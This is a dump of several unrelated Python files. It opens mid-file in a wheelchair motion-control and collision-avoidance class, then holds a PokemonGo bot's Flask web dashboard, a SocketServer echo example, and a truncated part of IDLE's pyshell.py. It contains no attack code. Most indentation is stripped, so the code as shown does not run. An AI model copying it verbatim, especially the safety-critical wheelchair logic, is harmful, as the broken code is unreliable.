time.sleep(delay)
#Decelerate
elif newSpeed < self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed - 1
self.transmitCommand(speed,self.setAngle,command)
time.sleep(delay)
        #Direction Reverse
if newSpeed < 0:
#Accelerate
if newSpeed < self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed - 1
time.sleep(delay)
self.transmitCommand(speed,self.setAngle,command)
#Decelerate
elif newSpeed > self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed + 1
time.sleep(delay)
self.transmitCommand(speed,self.setAngle,command)
if self.connected == True:
self.log("INFO = Speed has been ramped to "+str(newSpeed)+" with an acceleration of "+str(acceleration))
else:
self.log("ERROR = Wheelchair speed cannot be ramped.")
return newSpeed
    #Function to turn the wheelchair by a specific angle
def turn(self,angle):
factor = 40
if angle < 0:
delay = (-angle)/factor
self.transmitCommand(30,100,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
elif angle > 0:
delay = angle/factor
self.transmitCommand(-30,100,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
else:
self.transmitCommand(0,0,"SEND")
if self.connected == True:
self.log("INFO = Wheelchair has turned "+str(angle)+" degrees.")
else:
self.log("ERROR = Wheelchair has not turned as requested.")
    #Function to move the wheelchair a specific distance in meters
def move(self,distance):
factor = 1
delay = int(distance/factor)
self.transmitCommand(30,0,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
if self.connected == True:
self.log("INFO = Wheelchair has moved "+str(distance)+"m.")
else:
self.log("ERROR = Wheelchair cannot be moved.")
    #Function to change the wheelchair turning radius in meters
def changeRadius(self,radius):
delay = 0.1
factor = 1
radius = radius/factor
radius = int(radius)
angle = self.setAngle
while radius > self.setAngle:
angle = angle + 1
self.transmitCommand(self.setSpeed,angle,"SEND")
time.sleep(delay)
while radius < self.setAngle:
angle = angle - 1
self.transmitCommand(self.setSpeed,angle,"SEND")
time.sleep(delay)
if self.connected == True:
self.log("INFO = Wheelchair turning radius is now "+str(radius)+"m.")
else:
self.log("ERROR = Wheelchair turning radius cannot be changed.")
    #Function to change the wheelchair steering angle
def changeAngle(self, angle):
command = "SEND"
self.transmitCommand(self.setSpeed,angle,command)
if self.connected == True:
self.setAngle = angle
self.log("INFO = Wheelchair turning angle is now "+str(angle))
else:
self.log("ERROR = Wheelchair angle cannot be changed")
def changeSpeed(self, speed):
speed = int(speed)
command = "SEND"
self.transmitCommand(speed,self.setAngle,command)
if self.connected == True:
self.setSpeed = speed
self.log("INFO = Wheelchair speed is now set as "+str(speed))
else:
self.log("ERROR = Wheelchair speed cannot be changed")
#Emergency Stop the wheelchair
def eStop(self):
self.transmitCommand(0,0,"STOP")
if self.connected == True:
self.log("INFO: Wheelchair has Emergency Stopped.")
else:
self.log("ERROR = Warning, the Wheelchair cannot be stopped!")
#Reset the wheelchair
def reset(self):
self.transmitCommand(0,0,"RESET")
if self.connected == True:
self.log("INFO = Wheelchair is being reset.")
for x in range(self.bootTime,0,-1):
self.log("INFO = "+str(x)+" seconds remaining until wheelchair completes boot up.")
time.sleep(1)
else:
self.log("ERROR = Wheelchair cannot be reset.")
    #Function to Update Variables
def getUpdate(self):
self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
if self.connected == False:
self.log("INFO = Communication link down.")
    #Function to Calculate Speed Limit based on the value of the closest point
def calcMaxSpeed(self,closestObject):
x = closestObject
a = -5.6593
b = 29.089
c = -5.1123
d = 3.3333
#Third Order Deceleration Custom Profile
maxSpeedNew = (a*math.pow(x,3))+(b*math.pow(x,2))+(c*x)+d
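        #e.g. closestObject = 1.0m gives -5.6593 + 29.089 - 5.1123 + 3.3333 = 21.65,
        #so the speed limit becomes 21 after the rounding and truncation below.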
maxSpeedNew = round(maxSpeedNew,2)
self.maxSpeed = int(maxSpeedNew)
#Prevent Speeds higher than the limit set
if self.setSpeed > 0:
speedMagnitude = int(self.setSpeed)
if speedMagnitude > self.maxSpeed:
self.transmitCommand(self.maxSpeed,self.setAngle,"SEND")
#Collision Avoidance Algorithm
@threaded
def collisionAvoidance(self):
while 1:
#If Wheelchair is breaking the Speed Limit (Set by Closest Object)
if self.setSpeed > self.maxSpeed:
                #Determine Rate of Deceleration depending on delta
                deceleration = self.setSpeed - self.maxSpeed
                #Adjust Speed
                self.rampSpeed(self.maxSpeed,deceleration)
elif self.setSpeed < self.maxSpeed:
#Determine Rate of Acceleration depending on delta
acceleration = self.maxSpeed - self.setSpeed
#Adjust Speed
self.rampSpeed(self.maxSpeed,acceleration)
#Send and Receive Messages with implemented logging
def transmitCommand(self, speed, angle, command):
#Start Timing
start = time.time()
        #Make sure values passed are integers
speed = int(speed)
angle = int(angle)
#Check speed does not exceed limit
if speed > 0:
if speed > self.maxSpeed:
speed = self.maxSpeed
#Create form of the payload
payload = str(speed)+","+str(angle)+","+ command
#combine with host address
message = self.host + payload
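        #e.g. a host of "http://192.168.1.10/" (hypothetical) and a payload of
        #"30,0,RUN" produce the request URL http://192.168.1.10/30,0,RUN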
try:
response = requests.post(message,timeout=0.5)
data = response.content.decode("utf-8").split("\r\n")
if self.debug == True:
self.log("INFO = Transmission response code is "+str(response.status_code))
#Write log entry regarding data transmitted
self.transmitLog(str(speed) + "," + str(angle) + "," + command)
if data[0] != "":
#Write log entry regarding response
self.receiveLog(data[0])
self.log("STATUS = Received data is as follows; " + data[0])
#Decode Data
self.decodeResponse(data[0])
if response.status_code == 200:
self.connected = True
self.setSpeed = speed
self.setAngle = angle
self.setCommand = command
if self.debug == True:
end = time.time()
print("STATUS: Sending '",payload,"' took %.2f seconds." % round((end-start),2))
except:
self.log("ERROR = Could not access wheelchair API")
self.connected = False
|
__init__.py
|
from threading import Thread
import os
import logging
from flask import Flask, request, jsonify, render_template, send_from_directory
from flask_socketio import SocketIO, emit
from pokemongo_bot import logger
from pokemongo_bot.event_manager import manager
from api.json_encodable import JSONEncodable
# pylint: disable=unused-variable, unused-argument
logging.getLogger('socketio').disabled = True
logging.getLogger('engineio').disabled = True
logging.getLogger('werkzeug').disabled = True
google_maps_api_key = None
def run_flask():
root_dir = os.path.join(os.getcwd(), 'web')
app = Flask(__name__, static_folder=root_dir, template_folder=root_dir)
app.use_reloader = False
app.debug = False
app.config["SECRET_KEY"] = "OpenPoGoBot"
socketio = SocketIO(app, logging=False, engineio_logger=False)
cached_events = {}
active_bots = {}
@manager.on("bot_initialized")
def bot_initialized(bot):
# pylint: disable=global-statement
global google_maps_api_key
if google_maps_api_key is None or len(google_maps_api_key) == 0:
google_maps_api_key = bot.config.gmapkey
emitted_object = {
"username": bot.get_username(),
"coordinates": bot.get_position()
}
active_bots[bot.get_username()] = emitted_object
socketio.emit("bot_initialized", [emitted_object], namespace="/event")
@app.route("/")
def index():
if len(active_bots) == 0:
return "No bots currently active."
if google_maps_api_key is None or len(google_maps_api_key) == 0:
return "No Google Maps API key provided."
return render_template("index.html", google_maps_api_key=google_maps_api_key)
@app.route("/<path:path>")
def static_proxy(path):
return app.send_static_file(path)
@app.route("/get-running-bots")
def get_running_bots():
return jsonify(active_bots)
@socketio.on("connect", namespace="/event")
def connect():
socketio.emit("bot_initialized", [active_bots[bot] for bot in active_bots], namespace="/event")
logger.log("Web client connected", "yellow", fire_event=False)
@socketio.on("disconnect", namespace="/event")
def disconnect():
logger.log("Web client disconnected", "yellow", fire_event=False)
@manager.on("logging")
def logging_event(text="", color="black"):
line = {"output": text, "color": color}
socketio.emit("logging", [line], namespace="/event")
@manager.on("position_updated")
def position_update(bot, coordinates=None):
if coordinates is None:
return
emitted_object = {
"coordinates": coordinates,
"username": bot.get_username()
}
cached_events["position"] = emitted_object
active_bots[bot.get_username()]["coordinates"] = coordinates
socketio.emit("position", emitted_object, namespace="/event")
@manager.on("gyms_found", priority=-2000)
def gyms_found_event(bot=None, gyms=None):
if gyms is None or len(gyms) == 0:
return
emitted_object = {
"gyms": JSONEncodable.encode_list(gyms),
"username": bot.get_username()
}
cached_events["gyms"] = emitted_object
socketio.emit("gyms", emitted_object, namespace="/event")
@manager.on("pokestops_found", priority=-2000)
def pokestops_found_event(bot=None, pokestops=None):
if pokestops is None or len(pokestops) == 0:
return
emitted_object = {
"pokestops": JSONEncodable.encode_list(pokestops),
"username": bot.get_username()
}
cached_events["pokestops"] = emitted_object
socketio.emit("pokestops", emitted_object, namespace="/event")
@manager.on("player_update", priority=-2000)
def player_updated_event(bot=None, player=None):
if player is None:
return
emitted_object = {
"player": player.to_json_encodable(),
"username": bot.get_username()
}
cached_events["player"] = emitted_object
socketio.emit("player", emitted_object, namespace="/event")
@manager.on("inventory_update", priority=-2000)
def inventory_updated_event(bot, inventory=None):
# type: (PokemonGoBot, Dict[int, int]) -> None
if inventory is None or inventory.get("count", 0) == 0:
return
emitted_object = {
"inventory": inventory,
"username": bot.get_username()
}
cached_events["inventory"] = emitted_object
socketio.emit("inventory", emitted_object, namespace="/event")
@manager.on("pokemon_found", priority=-2000)
def pokemon_found_event(bot=None, encounters=None):
if encounters is None or len(encounters) == 0:
return
emitted_object = {
"nearby_pokemon": JSONEncodable.encode_list(encounters),
"username": bot.get_username()
}
cached_events["nearby_pokemon"] = emitted_object
socketio.emit("nearby_pokemon", emitted_object, namespace="/event")
socketio.run(app, host="0.0.0.0", port=8001, debug=False, use_reloader=False, log_output=False)
WEB_THREAD = Thread(target=run_flask)
WEB_THREAD.daemon = True
WEB_THREAD.start()
|
SocketServer_echo_simple.py
|
#!/usr/bin/env python
"""Echo server example for SocketServer
"""
#end_pymotw_header
import SocketServer
class EchoRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
        # Echo the data back to the client
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = SocketServer.TCPServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
message = 'Hello, world'
print 'Sending : "%s"' % message
len_sent = s.send(message)
# Receive a response
response = s.recv(len_sent)
print 'Received: "%s"' % response
# Clean up
server.shutdown()
s.close()
server.socket.close()
|
pyshell.py
|
#! /usr/bin/env python3
import sys
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import getopt
import io
import linecache
import os
import os.path
from platform import python_version, system
import re
import socket
import subprocess
import sys
import threading
import time
import tokenize
import warnings
from idlelib import testing # bool value
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib import macosx
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, PseudoInputFile, PseudoOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
        self.text.update()   # this update makes newly set "BREAK" tags visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.pyshell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
            # reload remote debugger breakpoints for all PyShellEditorWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import iomenu
# try:
# source = source.encode(iomenu.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
            self.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
